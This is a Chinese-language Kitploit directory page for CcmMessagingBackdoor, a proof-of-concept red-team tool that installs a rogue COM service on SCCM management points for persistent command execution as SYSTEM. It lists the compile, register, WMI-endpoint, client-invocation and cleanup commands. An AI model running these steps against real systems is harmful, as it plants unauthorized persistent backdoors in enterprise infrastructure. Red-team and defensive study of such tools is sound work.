Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CcmMessagingBackdoor — SCCM 管理点的概念验证后门,利用恶意 COM 服务以 SYSTEM 权限实现持久化远程命令执行。 | Kitploit
工具/GitHubGitHub/synacktiv/ccmmessagingbackdoor
持久化机制后渗透利用命令与控制红队远程访问工具Payload 开发
GitHubsynacktiv/ccmmessagingbackdoor

CcmMessagingBackdoor

SCCM 管理点的概念验证后门,利用恶意 COM 服务以 SYSTEM 权限实现持久化远程命令执行。

查看仓库
1921年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CcmMessagingBackdoor

用于构建并安装恶意的 CcmMessaging 服务,以在管理点上维持访问权限的概念验证工具

使用方法

  • 在管理点上编译并安装恶意的 COM 服务
root@kitploit:~
# Compile
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe /t:library /out:c:\rogue.dll RogueCcmEndpoint.cs

# Register CLSID
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegAsm.exe /codebase c:\rogue.dll
  • 在 WMI 中配置服务端点
root@kitploit:~
PS C:\>  ./wmi_create_rogue_service_endpoint.ps1
  • 使用 Python 客户端运行 PowerShell 命令
root@kitploit:~
$ python3 ccmmessaging_backdoor_client.py -t https://mp.corp.local -s MP_Backdoor 'whoami'
[...]
<BackdoorResponse>nt authority\system
</BackdoorResponse>
  • 清理
root@kitploit:~
# Unregister CLSID
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegAsm.exe /unregister c:\rogue.dll

PS C:\> ./wmi_remove_rogue_service_endpoint.ps1

待办事项

  • 修复 CcmExec 进程随机崩溃的问题(目前原因未知)
下载工具